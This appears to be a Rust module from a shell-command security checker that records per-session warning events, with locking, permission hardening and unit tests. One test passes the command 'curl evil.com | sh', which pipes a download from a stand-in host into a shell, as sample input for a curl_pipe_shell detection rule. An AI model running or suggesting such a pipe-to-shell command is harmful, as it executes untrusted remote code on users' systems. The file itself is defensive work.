1use std::collections::VecDeque;
11use std::fs::{self, OpenOptions};
12use std::io::Write;
13use std::path::PathBuf;
14
15use fs2::FileExt;
16use serde::{Deserialize, Serialize};
17
18use crate::verdict::{Evidence, Finding};
19
/// Upper bound on `SessionWarnings::events`; `record_outcome` drops the oldest
/// entries once this many are stored.
const MAX_EVENTS: usize = 100;
/// Upper bound on `SessionWarnings::escalation_events`; enforced by
/// `record_escalation_event`, oldest entries first.
const MAX_ESCALATION_EVENTS: usize = 20;
/// Upper bound on `SessionWarnings::hidden_events`; enforced by
/// `record_outcome`, oldest entries first.
const MAX_HIDDEN_EVENTS: usize = 50;
26
/// Per-session warning state, persisted as JSON at the path returned by
/// `session_state_path`.
///
/// Fields marked `#[serde(default)]` fall back to their default value when
/// they are absent from the stored JSON.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SessionWarnings {
    /// Identifier this state belongs to.
    pub session_id: String,
    /// RFC 3339 UTC timestamp taken when the state was first created.
    pub session_start: String,
    /// Running count of recorded warning events. It is incremented once per
    /// event and is not reduced when old events are trimmed from `events`.
    pub total_warnings: u32,
    /// Running count of hidden findings passed to `record_outcome`.
    #[serde(default)]
    pub hidden_findings: u32,
    /// Running count of hidden findings whose severity was `Low`.
    #[serde(default)]
    pub hidden_low: u32,
    /// Running count of hidden findings whose severity was `Info`.
    #[serde(default)]
    pub hidden_info: u32,
    /// Most recent warning events, oldest first, capped at `MAX_EVENTS`.
    pub events: VecDeque<WarningEvent>,
    /// Most recent escalation events, oldest first, capped at
    /// `MAX_ESCALATION_EVENTS`.
    #[serde(default)]
    pub escalation_events: VecDeque<EscalationEvent>,
    /// Most recent hidden findings, oldest first, capped at
    /// `MAX_HIDDEN_EVENTS`.
    #[serde(default)]
    pub hidden_events: VecDeque<HiddenEvent>,
}
50
/// One recorded warning finding, as stored in `SessionWarnings::events`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct WarningEvent {
    /// RFC 3339 UTC timestamp taken when the event was recorded.
    pub timestamp: String,
    /// String form of the rule that produced the finding.
    pub rule_id: String,
    /// String form of the finding's severity.
    pub severity: String,
    /// Finding title, passed through `truncate_bytes(.., 120)` before storage.
    pub title: String,
    /// The command after redaction and `truncate_bytes(.., 120)`.
    pub command_redacted: String,
    /// Lowercased hosts extracted from the finding's evidence, sorted and
    /// de-duplicated.
    pub domains: Vec<String>,
}
61
/// One recorded escalation hit, as stored in
/// `SessionWarnings::escalation_events`.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct EscalationEvent {
    /// RFC 3339 UTC timestamp taken when the hit was recorded.
    pub timestamp: String,
    /// Rule identifier copied from the escalation hit.
    pub rule_id: String,
    /// Domain copied from the escalation hit, if it had one. Omitted from the
    /// JSON when `None` and defaulted to `None` when missing on load.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub domain: Option<String>,
}
74
/// One recorded hidden finding, as stored in `SessionWarnings::hidden_events`.
///
/// Mirrors `WarningEvent` but carries no domain list.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct HiddenEvent {
    /// RFC 3339 UTC timestamp taken when the event was recorded.
    pub timestamp: String,
    /// String form of the rule that produced the finding.
    pub rule_id: String,
    /// String form of the finding's severity.
    pub severity: String,
    /// Finding title, passed through `truncate_bytes(.., 120)` before storage.
    pub title: String,
    /// The command after redaction and `truncate_bytes(.., 120)`.
    pub command_redacted: String,
}
84
85impl SessionWarnings {
86 fn new(session_id: &str) -> Self {
88 Self {
89 session_id: session_id.to_string(),
90 session_start: chrono::Utc::now().to_rfc3339(),
91 total_warnings: 0,
92 hidden_findings: 0,
93 hidden_low: 0,
94 hidden_info: 0,
95 events: VecDeque::new(),
96 escalation_events: VecDeque::new(),
97 hidden_events: VecDeque::new(),
98 }
99 }
100
101 pub fn count_by_rule(&self, rule_id: &str, window_minutes: u64) -> u32 {
103 let cutoff = cutoff_time(window_minutes);
104 self.events
105 .iter()
106 .filter(|e| e.rule_id == rule_id && e.timestamp.as_str() >= cutoff.as_str())
107 .count() as u32
108 }
109
110 pub fn count_by_rule_and_domain(
112 &self,
113 rule_id: &str,
114 domain: &str,
115 window_minutes: u64,
116 ) -> u32 {
117 let cutoff = cutoff_time(window_minutes);
118 let domain_lower = domain.to_lowercase();
119 self.events
120 .iter()
121 .filter(|e| {
122 e.rule_id == rule_id
123 && e.timestamp.as_str() >= cutoff.as_str()
124 && e.domains.iter().any(|d| d.to_lowercase() == domain_lower)
125 })
126 .count() as u32
127 }
128
129 pub fn count_all(&self, window_minutes: u64) -> u32 {
131 let cutoff = cutoff_time(window_minutes);
132 self.events
133 .iter()
134 .filter(|e| e.timestamp.as_str() >= cutoff.as_str())
135 .count() as u32
136 }
137
138 pub fn top_rules(&self) -> Vec<(String, u32)> {
140 let mut counts = std::collections::HashMap::<String, u32>::new();
141 for e in &self.events {
142 *counts.entry(e.rule_id.clone()).or_default() += 1;
143 }
144 let mut sorted: Vec<_> = counts.into_iter().collect();
145 sorted.sort_by_key(|s| std::cmp::Reverse(s.1));
146 sorted
147 }
148}
149
150fn cutoff_time(window_minutes: u64) -> String {
152 let cutoff =
153 chrono::Utc::now() - chrono::Duration::minutes(window_minutes.min(u32::MAX as u64) as i64);
154 cutoff.to_rfc3339()
155}
156
157pub fn session_state_path(session_id: &str) -> Option<PathBuf> {
162 if session_id.is_empty() || session_id.len() > 128 {
163 return None;
164 }
165 if !session_id
166 .chars()
167 .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
168 {
169 return None;
170 }
171 let state = crate::policy::state_dir()?;
172 Some(state.join("sessions").join(format!("{session_id}.json")))
173}
174
175pub fn load(session_id: &str) -> SessionWarnings {
180 let path = match session_state_path(session_id) {
181 Some(p) => p,
182 None => return SessionWarnings::new(session_id),
183 };
184
185 let file = match fs::File::open(&path) {
186 Ok(f) => f,
187 Err(_) => return SessionWarnings::new(session_id),
188 };
189
190 if fs2::FileExt::lock_shared(&file).is_err() && fs2::FileExt::try_lock_shared(&file).is_err() {
192 return SessionWarnings::new(session_id);
193 }
194
195 use std::io::Read;
196 let mut content = String::new();
197 let result = (&file).read_to_string(&mut content);
198 let _ = fs2::FileExt::unlock(&file);
199
200 if result.is_err() || content.is_empty() {
201 return SessionWarnings::new(session_id);
202 }
203
204 serde_json::from_str::<SessionWarnings>(&content).unwrap_or_else(|e| {
205 crate::audit::audit_diagnostic(format!(
206 "tirith: session: corrupt state for '{}': {e} — resetting",
207 session_id
208 ));
209 SessionWarnings::new(session_id)
210 })
211}
212
213pub fn record_warning(session_id: &str, findings: &[&Finding], cmd: &str, dlp_patterns: &[String]) {
217 record_outcome(session_id, findings, &[], cmd, dlp_patterns);
218}
219
220pub fn record_outcome(
228 session_id: &str,
229 warn_findings: &[&Finding],
230 hidden_findings_list: &[&Finding],
231 cmd: &str,
232 dlp_patterns: &[String],
233) {
234 if warn_findings.is_empty() && hidden_findings_list.is_empty() {
235 return;
236 }
237
238 let hidden_count = hidden_findings_list.len() as u32;
240 let hidden_low = hidden_findings_list
241 .iter()
242 .filter(|f| f.severity == crate::verdict::Severity::Low)
243 .count() as u32;
244 let hidden_info = hidden_findings_list
245 .iter()
246 .filter(|f| f.severity == crate::verdict::Severity::Info)
247 .count() as u32;
248
249 let command_redacted = crate::redact::redact_command_text(cmd, dlp_patterns);
251 let command_redacted = crate::util::truncate_bytes(&command_redacted, 120);
252 let now = chrono::Utc::now().to_rfc3339();
253
254 struct FindingData {
256 rule_id: String,
257 severity: String,
258 title: String,
259 domains: Vec<String>,
260 }
261 let finding_data: Vec<FindingData> = warn_findings
262 .iter()
263 .map(|f| FindingData {
264 rule_id: f.rule_id.to_string(),
265 severity: f.severity.to_string(),
266 title: crate::util::truncate_bytes(&f.title, 120),
267 domains: extract_domains_from_evidence(&f.evidence),
268 })
269 .collect();
270
271 let hidden_data: Vec<FindingData> = hidden_findings_list
273 .iter()
274 .map(|f| FindingData {
275 rule_id: f.rule_id.to_string(),
276 severity: f.severity.to_string(),
277 title: crate::util::truncate_bytes(&f.title, 120),
278 domains: Vec::new(), })
280 .collect();
281
282 with_session_locked(session_id, |session| {
283 session.hidden_findings = session.hidden_findings.saturating_add(hidden_count);
285 session.hidden_low = session.hidden_low.saturating_add(hidden_low);
286 session.hidden_info = session.hidden_info.saturating_add(hidden_info);
287
288 for fd in &finding_data {
290 let event = WarningEvent {
291 timestamp: now.clone(),
292 rule_id: fd.rule_id.clone(),
293 severity: fd.severity.clone(),
294 title: fd.title.clone(),
295 command_redacted: command_redacted.clone(),
296 domains: fd.domains.clone(),
297 };
298 session.events.push_back(event);
299 session.total_warnings = session.total_warnings.saturating_add(1);
300 }
301
302 for hd in &hidden_data {
304 session.hidden_events.push_back(HiddenEvent {
305 timestamp: now.clone(),
306 rule_id: hd.rule_id.clone(),
307 severity: hd.severity.clone(),
308 title: hd.title.clone(),
309 command_redacted: command_redacted.clone(),
310 });
311 }
312
313 while session.events.len() > MAX_EVENTS {
315 session.events.pop_front();
316 }
317
318 while session.hidden_events.len() > MAX_HIDDEN_EVENTS {
320 session.hidden_events.pop_front();
321 }
322 });
323}
324
325pub fn record_escalation_event(session_id: &str, hits: &[crate::escalation::EscalationHit]) {
331 if hits.is_empty() {
332 return;
333 }
334
335 let now = chrono::Utc::now().to_rfc3339();
336
337 with_session_locked(session_id, |session| {
338 for hit in hits {
339 session.escalation_events.push_back(EscalationEvent {
340 timestamp: now.clone(),
341 rule_id: hit.rule_id.clone(),
342 domain: hit.domain.clone(),
343 });
344 }
345 while session.escalation_events.len() > MAX_ESCALATION_EVENTS {
347 session.escalation_events.pop_front();
348 }
349 });
350}
351
352fn with_session_locked<F>(session_id: &str, mutate: F)
358where
359 F: FnOnce(&mut SessionWarnings),
360{
361 let path = match session_state_path(session_id) {
362 Some(p) => p,
363 None => return,
364 };
365
366 if let Some(parent) = path.parent() {
368 if let Err(e) = fs::create_dir_all(parent) {
369 crate::audit::audit_diagnostic(format!(
370 "tirith: session: cannot create state dir {}: {e}",
371 parent.display()
372 ));
373 return;
374 }
375 }
376
377 #[cfg(unix)]
379 {
380 match std::fs::symlink_metadata(&path) {
381 Ok(meta) if meta.file_type().is_symlink() => {
382 crate::audit::audit_diagnostic(format!(
383 "tirith: session: refusing to follow symlink at {}",
384 path.display()
385 ));
386 return;
387 }
388 _ => {}
389 }
390 }
391
392 let mut open_opts = OpenOptions::new();
394 open_opts.read(true).write(true).create(true);
395 #[cfg(unix)]
396 {
397 use std::os::unix::fs::OpenOptionsExt;
398 open_opts.mode(0o600);
399 open_opts.custom_flags(libc::O_NOFOLLOW);
400 }
401
402 let file = match open_opts.open(&path) {
403 Ok(f) => f,
404 Err(e) => {
405 crate::audit::audit_diagnostic(format!(
406 "tirith: session: cannot open {} — escalation may be impaired: {e}",
407 path.display()
408 ));
409 return;
410 }
411 };
412
413 #[cfg(unix)]
415 {
416 use std::os::unix::fs::PermissionsExt;
417 let _ = file.set_permissions(std::fs::Permissions::from_mode(0o600));
418 }
419
420 let locked = file.lock_exclusive().is_ok() || file.try_lock_exclusive().is_ok();
422 if !locked {
423 crate::audit::audit_diagnostic(format!(
424 "tirith: session: cannot lock {} — recording skipped",
425 path.display()
426 ));
427 return;
428 }
429
430 use std::io::Read;
432 let mut content = String::new();
433 let _ = (&file).read_to_string(&mut content);
434 let mut session: SessionWarnings = if content.is_empty() {
435 SessionWarnings::new(session_id)
436 } else {
437 serde_json::from_str(&content).unwrap_or_else(|e| {
438 crate::audit::audit_diagnostic(format!(
439 "tirith: session: corrupt state for '{}': {e} — resetting",
440 session_id
441 ));
442 SessionWarnings::new(session_id)
443 })
444 };
445
446 mutate(&mut session);
448
449 let json = match serde_json::to_string(&session) {
450 Ok(j) => j,
451 Err(e) => {
452 crate::audit::audit_diagnostic(format!(
453 "tirith: session: failed to serialize warnings: {e}"
454 ));
455 let _ = fs2::FileExt::unlock(&file);
456 return;
457 }
458 };
459
460 use std::io::Seek;
462 if file.set_len(0).is_err() || (&file).seek(std::io::SeekFrom::Start(0)).is_err() {
463 crate::audit::audit_diagnostic(format!(
464 "tirith: session: truncate/seek failed for {} — skipping write",
465 path.display()
466 ));
467 let _ = fs2::FileExt::unlock(&file);
468 return;
469 }
470 let mut writer = std::io::BufWriter::new(&file);
471 if let Err(e) = writer.write_all(json.as_bytes()) {
472 crate::audit::audit_diagnostic(format!(
473 "tirith: session: write failed for {}: {e}",
474 path.display()
475 ));
476 }
477 if let Err(e) = writer.flush() {
478 crate::audit::audit_diagnostic(format!(
479 "tirith: session: flush failed for {}: {e}",
480 path.display()
481 ));
482 }
483 let _ = file.sync_all();
484 let _ = fs2::FileExt::unlock(&file);
485
486 opportunistic_gc();
488}
489
490pub fn extract_domains_from_evidence(evidence: &[Evidence]) -> Vec<String> {
492 let mut domains = Vec::new();
493 for ev in evidence {
494 match ev {
495 Evidence::Url { raw } => {
496 if let Some(host) = extract_host(raw) {
497 domains.push(host);
498 }
499 }
500 Evidence::HostComparison { raw_host, .. } => {
501 domains.push(raw_host.to_lowercase());
502 }
503 _ => {}
504 }
505 }
506 domains.sort();
507 domains.dedup();
508 domains
509}
510
511fn extract_host(url: &str) -> Option<String> {
513 if let Ok(parsed) = url::Url::parse(url) {
514 return parsed.host_str().map(|h| h.to_lowercase());
515 }
516 let candidate = url.split('/').next()?;
518 if candidate.contains('.') && !candidate.contains(' ') {
519 let host = candidate.split(':').next().unwrap_or(candidate);
520 return Some(host.to_lowercase());
521 }
522 None
523}
524
525fn opportunistic_gc() {
530 let gc_marker = match crate::policy::state_dir() {
531 Some(d) => d.join("sessions").join(".last_gc"),
532 None => return,
533 };
534 if let Ok(meta) = fs::metadata(&gc_marker) {
535 if let Ok(modified) = meta.modified() {
536 if let Ok(age) = modified.elapsed() {
537 if age.as_secs() < 3600 {
538 return;
539 }
540 }
541 }
542 }
543 let _ = fs::write(&gc_marker, "");
545 gc_stale_sessions(72);
546}
547
548pub fn gc_stale_sessions(max_age_hours: u64) {
550 let state = match crate::policy::state_dir() {
551 Some(s) => s,
552 None => return,
553 };
554 let sessions_dir = state.join("sessions");
555 let entries = match fs::read_dir(&sessions_dir) {
556 Ok(e) => e,
557 Err(_) => return,
558 };
559
560 let max_age = std::time::Duration::from_secs(max_age_hours * 3600);
561 let now = std::time::SystemTime::now();
562
563 for entry in entries.flatten() {
564 let path = entry.path();
565 if path.extension().and_then(|e| e.to_str()) != Some("json") {
566 continue;
567 }
568 let meta = match fs::metadata(&path) {
569 Ok(m) => m,
570 Err(_) => continue,
571 };
572 let modified = match meta.modified() {
573 Ok(t) => t,
574 Err(_) => continue,
575 };
576 if let Ok(age) = now.duration_since(modified) {
577 if age > max_age {
578 let _ = fs::remove_file(&path);
579 }
580 }
581 }
582}
583
584pub fn clear_session(session_id: &str) {
586 if let Some(path) = session_state_path(session_id) {
587 let _ = fs::remove_file(&path);
588 }
589}
590
// Unit tests for session state: path validation, persistence round trip,
// windowed counting, rule ranking, event capping and domain extraction.
#[cfg(test)]
mod tests {
    use super::*;
    use crate::verdict::{Evidence, Finding, RuleId, Severity};

    /// Builds a finding with fixed title/description and a single URL evidence
    /// entry pointing at `evil.example.com`.
    fn make_finding(rule_id: RuleId, severity: Severity) -> Finding {
        Finding {
            rule_id,
            severity,
            title: "Test finding".to_string(),
            description: "desc".to_string(),
            evidence: vec![Evidence::Url {
                raw: "https://evil.example.com/path".to_string(),
            }],
            human_view: None,
            agent_view: None,
            mitre_id: None,
            custom_rule_id: None,
        }
    }

    #[test]
    fn test_session_state_path_validation() {
        // Accepted: letters, digits, '-' and '_'.
        assert!(session_state_path("abc-123_DEF").is_some());
        assert!(session_state_path("a").is_some());

        // Rejected: empty id.
        assert!(session_state_path("").is_none());

        // Rejected: path traversal and separators.
        assert!(session_state_path("../etc/passwd").is_none());
        assert!(session_state_path("foo/bar").is_none());
        assert!(session_state_path("..").is_none());

        // Rejected: characters outside the allowed set.
        assert!(session_state_path("foo bar").is_none());
        assert!(session_state_path("foo.bar").is_none());

        // Rejected: one byte over the 128-byte limit.
        let long_id = "a".repeat(129);
        assert!(session_state_path(&long_id).is_none());

        // Accepted: exactly at the limit.
        let max_id = "a".repeat(128);
        assert!(session_state_path(&max_id).is_some());
    }

    #[test]
    fn test_load_returns_default_on_missing() {
        // No state file is expected for this id, so `load` must hand back a
        // fresh state carrying the requested id.
        let session = load("nonexistent-session-id-12345");
        assert_eq!(session.session_id, "nonexistent-session-id-12345");
        assert_eq!(session.total_warnings, 0);
        assert!(session.events.is_empty());
    }

    #[cfg(unix)]
    #[test]
    fn test_record_and_load_cycle() {
        // Hold the shared env lock for the whole test; a poisoned lock is
        // recovered so one failed test does not cascade.
        let _guard = crate::TEST_ENV_LOCK
            .lock()
            .unwrap_or_else(|e| e.into_inner());

        // Point the state directory at a temp dir.
        // NOTE(review): assumes `crate::policy::state_dir()` honours XDG_STATE_HOME — confirm.
        let dir = tempfile::tempdir().unwrap();
        let state_home = dir.path().join("state");
        // SAFETY: environment mutation is serialized through TEST_ENV_LOCK held
        // above; presumably every env-touching test takes it — TODO confirm.
        unsafe { std::env::set_var("XDG_STATE_HOME", &state_home) };

        let session_id = "test-session-rec-001";

        // First write: two findings recorded in one call.
        let f1 = make_finding(RuleId::CurlPipeShell, Severity::High);
        let f2 = make_finding(RuleId::NonAsciiHostname, Severity::Medium);
        record_warning(session_id, &[&f1, &f2], "curl evil.com | sh", &[]);

        // Both events must come back, in insertion order.
        let session = load(session_id);
        assert_eq!(session.total_warnings, 2);
        assert_eq!(session.events.len(), 2);
        assert_eq!(session.events[0].rule_id, "curl_pipe_shell");
        assert_eq!(session.events[1].rule_id, "non_ascii_hostname");

        // The host from the URL evidence must have been extracted.
        assert!(session.events[0]
            .domains
            .contains(&"evil.example.com".to_string()));

        // Second write appends to the existing state.
        let f3 = make_finding(RuleId::ShortenedUrl, Severity::Low);
        record_warning(session_id, &[&f3], "bit.ly/foo", &[]);

        let session = load(session_id);
        assert_eq!(session.total_warnings, 3);
        assert_eq!(session.events.len(), 3);

        // Clearing removes the file, so the next load starts fresh.
        clear_session(session_id);
        let session = load(session_id);
        assert_eq!(session.total_warnings, 0);

        // SAFETY: still under TEST_ENV_LOCK (see above).
        unsafe { std::env::remove_var("XDG_STATE_HOME") };
    }

    #[test]
    fn test_count_by_rule_with_window() {
        let mut session = SessionWarnings::new("test");
        // One event stamped "now" ...
        session.events.push_back(WarningEvent {
            timestamp: chrono::Utc::now().to_rfc3339(),
            rule_id: "curl_pipe_shell".to_string(),
            severity: "HIGH".to_string(),
            title: "test".to_string(),
            command_redacted: "cmd".to_string(),
            domains: vec![],
        });
        // ... and one stamped two hours ago.
        let old_time = (chrono::Utc::now() - chrono::Duration::hours(2)).to_rfc3339();
        session.events.push_back(WarningEvent {
            timestamp: old_time,
            rule_id: "curl_pipe_shell".to_string(),
            severity: "HIGH".to_string(),
            title: "test".to_string(),
            command_redacted: "cmd".to_string(),
            domains: vec![],
        });

        // A 60-minute window sees only the recent event.
        assert_eq!(session.count_by_rule("curl_pipe_shell", 60), 1);
        // A 180-minute window sees both.
        assert_eq!(session.count_by_rule("curl_pipe_shell", 180), 2);
        // A rule with no events counts zero.
        assert_eq!(session.count_by_rule("non_ascii_hostname", 180), 0);
    }

    #[test]
    fn test_count_by_rule_and_domain() {
        // Two events for the same rule but different domains.
        let mut session = SessionWarnings::new("test");
        session.events.push_back(WarningEvent {
            timestamp: chrono::Utc::now().to_rfc3339(),
            rule_id: "non_ascii_hostname".to_string(),
            severity: "MEDIUM".to_string(),
            title: "test".to_string(),
            command_redacted: "cmd".to_string(),
            domains: vec!["evil.com".to_string()],
        });
        session.events.push_back(WarningEvent {
            timestamp: chrono::Utc::now().to_rfc3339(),
            rule_id: "non_ascii_hostname".to_string(),
            severity: "MEDIUM".to_string(),
            title: "test".to_string(),
            command_redacted: "cmd".to_string(),
            domains: vec!["good.com".to_string()],
        });

        // Each domain matches exactly its own event; an unknown domain matches none.
        assert_eq!(
            session.count_by_rule_and_domain("non_ascii_hostname", "evil.com", 60),
            1
        );
        assert_eq!(
            session.count_by_rule_and_domain("non_ascii_hostname", "good.com", 60),
            1
        );
        assert_eq!(
            session.count_by_rule_and_domain("non_ascii_hostname", "other.com", 60),
            0
        );
    }

    #[test]
    fn test_count_all() {
        // Five fresh events must all fall inside a 60-minute window.
        let mut session = SessionWarnings::new("test");
        for _ in 0..5 {
            session.events.push_back(WarningEvent {
                timestamp: chrono::Utc::now().to_rfc3339(),
                rule_id: "any_rule".to_string(),
                severity: "LOW".to_string(),
                title: "test".to_string(),
                command_redacted: "cmd".to_string(),
                domains: vec![],
            });
        }
        assert_eq!(session.count_all(60), 5);
    }

    #[test]
    fn test_top_rules() {
        // Three events for rule_a, one for rule_b.
        let mut session = SessionWarnings::new("test");
        for _ in 0..3 {
            session.events.push_back(WarningEvent {
                timestamp: chrono::Utc::now().to_rfc3339(),
                rule_id: "rule_a".to_string(),
                severity: "LOW".to_string(),
                title: "test".to_string(),
                command_redacted: "cmd".to_string(),
                domains: vec![],
            });
        }
        session.events.push_back(WarningEvent {
            timestamp: chrono::Utc::now().to_rfc3339(),
            rule_id: "rule_b".to_string(),
            severity: "LOW".to_string(),
            title: "test".to_string(),
            command_redacted: "cmd".to_string(),
            domains: vec![],
        });

        // The rule with the highest count comes first.
        let top = session.top_rules();
        assert_eq!(top[0], ("rule_a".to_string(), 3));
        assert_eq!(top[1], ("rule_b".to_string(), 1));
    }

    #[test]
    fn test_event_cap() {
        // Push more events than the cap allows while counting every one.
        let mut session = SessionWarnings::new("test");
        for i in 0..150 {
            session.events.push_back(WarningEvent {
                timestamp: chrono::Utc::now().to_rfc3339(),
                rule_id: format!("rule_{i}"),
                severity: "LOW".to_string(),
                title: "test".to_string(),
                command_redacted: "cmd".to_string(),
                domains: vec![],
            });
            session.total_warnings += 1;
        }
        // Same trimming loop shape as the recording path.
        while session.events.len() > MAX_EVENTS {
            session.events.pop_front();
        }
        // The queue is capped, but the running total keeps the full count.
        assert_eq!(session.events.len(), MAX_EVENTS);
        assert_eq!(session.total_warnings, 150);
    }

    #[test]
    fn test_extract_domains_from_evidence() {
        // URL and host-comparison evidence contribute hosts; text evidence does not.
        let evidence = vec![
            Evidence::Url {
                raw: "https://evil.example.com/path".to_string(),
            },
            Evidence::HostComparison {
                raw_host: "GITHUB.COM".to_string(),
                similar_to: "g1thub.com".to_string(),
            },
            Evidence::Text {
                detail: "irrelevant".to_string(),
            },
        ];
        let domains = extract_domains_from_evidence(&evidence);
        assert!(domains.contains(&"evil.example.com".to_string()));
        // Hosts are lowercased.
        assert!(domains.contains(&"github.com".to_string()));
        assert_eq!(domains.len(), 2);
    }
}